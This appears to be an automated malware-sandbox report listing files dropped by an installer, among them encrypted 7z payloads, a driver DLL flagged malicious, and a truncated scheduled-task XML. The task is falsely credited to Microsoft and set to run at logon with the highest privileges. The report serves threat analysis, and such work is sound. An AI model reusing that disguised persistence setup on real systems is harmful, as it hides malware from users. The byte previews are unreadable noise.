                                            SHA-512:28A92FD2EFFB559F073D6A853C66EF9371B9EEB18C8629896134F84384D5439FAC7B11EFDF36DD7A3DBFAB455704A50F3B63EB5574E3B3BF5B4DAC05B319EB85
                                            Malicious:false
                                            Preview:.@S.......=.o..................]..j...9Nu....1...#... .B4.R...;.I...P.f...Q.+..$...q...!......@.^fS..yw2.5.`GSH.C.W..B..y..S...^.&.N.U..u..{Y..T*.9..[.=!*......Q...;.|...t.../NJ|K....#..&6Y...{.%.)..C;.....).6./._...a.r3.hdEE/../%X..;:..BHMO.^..+s....x5_=T9........e...C.4@OM...I.Ypz.U.}.`..EH..`W-....9g......m...5...8..Q.~..UAJ@.T&.h.S..m..T./Oa[xb..`.;1.... ...,#.;...^.a.pD.....1^....E(e.z.7...;........Q.K.....p.... ..M??Q_..U.\O..W..)..fI...&...::r.A).....P"....(sV..ma.I*.17D..4....x.%....\.m...k.`U+.*.u. a...R`!.}...d.+..*...Ij.i..\..<...i.> ../.Wm(.H..b&.!.....5x[....H=bY.....+......6...~........A}...`.O\{....<.T-.... a.\..t....,.....,......R.3Q....).p.9b.k:.~..........)[..g..*.R..w.... .Yx...\yXd+.Ly3mW0.../......E...O.erN.9.:..4.w...=......>HU.....bi.....=R'.>.........B.......;...7.......m..b....a..=.az.dN..6R...J7.qnRM..S..iU.@.. _wY.fC..:..O.....o.h..;.....>*..M.........].7?..H..*....][.../9n.\...i.T....,.....i..oF.....3....oH.C.T

                                            C:\Program Files (x86)\Windows NT\locale.bin

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):56530
                                            Entropy (8bit):7.99718779846658
                                            Encrypted:true
                                            SSDEEP:1536:739J1GGcyRSPpLJDG96df03+XVrquIeYE3JI:73VSygPp5GU03sVrRYEG
                                            MD5:C543AB5E4E1259A032C1A8409D41EB01
                                            SHA1:C860FE9B372DE808AC21EFDB7C01E4590D6D8146
                                            SHA-256:2A8BBCE4FDB9CB4F66E7CAACEC53A8C6CF94476113283B8CC170836689E8416A
                                            SHA-512:67F7B57DE241B247410233BE0B6641F483D0C30BDD67BC16F7EB41792B900C80D6884D4B3EBC4ADF8FD678467C6A59FD67E4456CF5AA686A3ECFF9E2DB04FC93
                                            Malicious:false
                                            Preview:.@S.......w| ..............$63..K..}9~Q.C...P.7_..2.5.\'|....E.....wM.*....p.o..G..8....i.0..T.".2N..:>....'..;Nf.@.A.A..;H.G.g.x.4........C./..A.....tB..U4.. e0E.R.P..B....7+...C]0x..m...*....u...3..V,...R.$..J.Z.u........u0...($.g.......p..uQ....).).\iz...R.K..e.q..#B.....Szj.@:....?..I3..l..--......6.z.}&.t..kI.....4..kH....K..:.......K...X.S.Ir_...E..}..k.>..^KQz._.H..........r?..;..gIK.v.L..2u.........tQy..oM....n.'E.xm.9J.....Rs..\....SdxVm)dq7GS...._.n... .-.b.........I.q..7.]....C.[v.......-.#..t..8.b1HW...D...w.T.....Z....5y..{.]|...plJ(..y.....k............./.\k^....3y.)....x..]...%v.0W........I[./..n..D. ...ji....E.:......9......j|O..A...i...&N>..`'B2.!kk.x.z..fUcz....+".J.-...o0......A....|n......t[zg....b..<L..c.<.....k(.0...XN:...O.?V..=[OM.O...T.....O....@~s..^4 .ID.o..z{.....b....u.<f...s...<j.q.o..`.j.9..Kh.n.Xja......J....g....c....3....].m..rU..... .Qj.a...14..5..x ..C;N.^+..rS4..'!.1....O5"...D.LF~8.N;..EI..

                                            C:\Program Files (x86)\Windows NT\locale.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):56530
                                            Entropy (8bit):7.997187798466584
                                            Encrypted:true
                                            SSDEEP:1536:8YpC7sShwCOb2MCH6eNF83JO5tNIMgiMRF8rMC+:T4K2MCH6edzNIMFMLAMC+
                                            MD5:F901ACE8EF84F275D5BE15DF6598C24C
                                            SHA1:4A94B54CB0194D52157E1ADC2EAA643C3337E138
                                            SHA-256:90FAF1B0A25363DE038DF758442FC2E0A4F52332BFE36A63A4FFA9A6FC0141F5
                                            SHA-512:0E5C4551C8143B429F267D0E90D8E1AEFCBC5AE138954BC9E1AB17D5E181B878F1A85FA55CDA7B7697E33E1114BA9A2B4DE499D91D8B86F9B2B8D60486FCCFA3
                                            Malicious:false
                                            Preview:7z..'...N%..........2...........l.t .....zU..y.uR.....x|6...v./>..).'eCs`...f..._...Z+.~..O...'.N......^.O.....z....L...}..<.p..../.;.R..7r.bB.R....Jy...W..z...TF...@...i$Ud...v"y.*5#\.&..*.^.A.01..nx.].ya...I...2..K.nf..'ff...7.....,&..<..TN.|.\.Y.A.....D)~.c..5..r.0...Cd...]...se4.o....$..H..|..'J;-..0J..p.tt..v..s^.(...[8.31.h.I:..R.~E...Z....V..T,.N>./.6.......J.....'.4.f...cu......8.2..5..y..Li.q.....NN..Tp...z.)..#....ok...X..(...........J8.X.6u.p5..p..T(.:c0..........1.h\.m....U.~v.z>...X.Y..$r..5...t..t......";..].?..qS.;..*......C..i...(_...#.V+w.As#4iYIy..~a...1=IS.;.;sF-y-.OD..y!P... h.\]8...:......%..M.G.N.2.....|&....k.?3..l.). .....y.?3.J..:>..V........x...e.....X...l...k@....)2.Yi....N..+n..@0.N....n.....-f..]......`......By.s...y.B.3..\......js..N..RW....X/Q....Wh...^..@.k&.. .../..m.`.*N.....d[C......^;.W.*.....+.+...b'.nO).Mmh..XR&..HOk.....R_.7.R#..,...v..)..X.JVZ..M..d(......Y.......S~..;E...pyg6...''p,|.B.......N...

                                            C:\Program Files (x86)\Windows NT\locale2.bin

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):56546
                                            Entropy (8bit):7.996966859255975
                                            Encrypted:true
                                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                            Malicious:false
                                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                                            C:\Program Files (x86)\Windows NT\locale2.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):56546
                                            Entropy (8bit):7.996966859255979
                                            Encrypted:true
                                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                            MD5:4CB8B7E557C80FC7B014133AB834A042
                                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                            Malicious:false
                                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                                            C:\Program Files (x86)\Windows NT\locale3.bin

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):31890
                                            Entropy (8bit):7.99402458740637
                                            Encrypted:true
                                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                            MD5:8622FC7228777F64A47BD6C61478ADD9
                                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                            Malicious:false
                                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                                            C:\Program Files (x86)\Windows NT\locale3.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):31890
                                            Entropy (8bit):7.99402458740637
                                            Encrypted:true
                                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                            Malicious:false
                                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                                            C:\Program Files (x86)\Windows NT\locale4.bin

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):74960
                                            Entropy (8bit):7.99759370165655
                                            Encrypted:true
                                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                            MD5:950338D50B95A25F494EE74E97B7B7A9
                                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                            Malicious:false
                                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                                            C:\Program Files (x86)\Windows NT\locale4.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):74960
                                            Entropy (8bit):7.997593701656546
                                            Encrypted:true
                                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                            Malicious:false
                                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                                            C:\Program Files (x86)\Windows NT\locale7.bin

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):29730
                                            Entropy (8bit):7.994290657653607
                                            Encrypted:true
                                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                            Malicious:false
                                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                                            C:\Program Files (x86)\Windows NT\locale7.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):29730
                                            Entropy (8bit):7.994290657653608
                                            Encrypted:true
                                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                            Malicious:false
                                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                                            C:\Program Files (x86)\Windows NT\res.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528534
                                            Encrypted:true
                                            SSDEEP:49152:6jJ02hc8V622MtAIbUYI66AEocdfyFH/LJ:6N0ec8V62TGfc2T5W/9
                                            MD5:A14A4C056F1A4534901E4935570C4F48
                                            SHA1:BA84CC3B67C8DCA8D3C97C2DA8E3FAF6CABE8174
                                            SHA-256:85F05D2CB6D24DCAE2567E018E7FDE529AD5C84E65F305A39BECD1F0D117AC0D
                                            SHA-512:BB3C0AA15F42C0B75AB1D31273816C1B2026672F97219C987815E3F0A215CE22881330C4EE707258C61B3BCBA0843932DC97EEAFE53B710EBBA2F7FF35E52DE7
                                            Malicious:false
                                            Preview:7z..'...............@........4.)yp.y[r..4{...P...G..E.B..:..Z..Q.I?1..Vv...8.....i..y...Dg.r@U..7...K....I..........g..&.....n..0\...W.X..IY..6o.....l7`./....Y.N.>./*2T.A.,...e......_v...80...'<.^.j.z_..:s.)'~.\. .V.t...$.y.......~..9S...m.F......h..KE2k<.....2.k...#...f0.....|"\u...J...C..!@../X....;.#..m._..YO.y....!..z..........D...m.....z._i.......z.....%..U..Q6"..6.ZG..^.0[....qY....Um..r..b.<Tg.s...y..F.v.<i(.J..U.a...|....hL.T..*...t.._..I.x.0<3......0.x..j]b.../.T..y..A.....(.\\...Q....)...a..@...Q.1..../....i...M.?.*...lZ..(..g.]....$}....c......,.*1....!.o[<.........HXJ..t.P.A=....7.GM.........1h.D....]sg.....+.*`:...i..lT.\.Vb._..e"l9!v..$.).n..........>l.w.m..|}.IZ.....9.p..C.|PP\.W.._G|...........469....=I..SP..$....."..j....o!...|%.x/K....[Z.....hMM5....M.V/'+.6.o..tWOSGQW..J..U"....3.7.YH.N\]..w.h......x......?^.....n..S.8.........2`........?..l.l/.R.Y.F...;.Uf&../2.......v..&.lEV....r3..H.......9..t.e|..."...%.......i..~.

                                            C:\Program Files (x86)\Windows NT\tProtect.dll

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):63640
                                            Entropy (8bit):6.482810107683822
                                            Encrypted:false
                                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 9%
                                            • Antivirus: Virustotal, Detection: 6%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                                            C:\Program Files (x86)\Windows NT\task.xml

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):4096
                                            Entropy (8bit):3.3443983145211007
                                            Encrypted:false
                                            SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                                            MD5:1E67E91688292692932CD9096EDEA2BD
                                            SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                                            SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                                            SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                                            Malicious:false
                                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva

                                            C:\Program Files (x86)\Windows NT\trash

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1426032
                                            Entropy (8bit):7.9998542527026695
                                            Encrypted:true
                                            SSDEEP:24576:8tTH+7iBbbOvhHw2pyblBmyLZbeVJEOgKmCAhFFgLcPBfROlaqH3E5s5bk9HVN8V:8N+A4hH/mwihqEOChFFgLcZ5OlHH3E5G
                                            MD5:693BFF71A8287B9288D546808FE0E6B0
                                            SHA1:9731E1120AE905A97DAF9ACF9FCC3BD3CADBF4E8
                                            SHA-256:BA5CEEE2D0762403546C92509142146F68826B19A74D8C62722CC696BC24C257
                                            SHA-512:CB82F8A0A52DADB848849F84DC6E9A6A809308AD06EB2DA1413927F583ED913966A2654BE1A55A2B2DA3A9B330E523303E8408DB1C6C492BB3B84F2486C9DC16
                                            Malicious:false
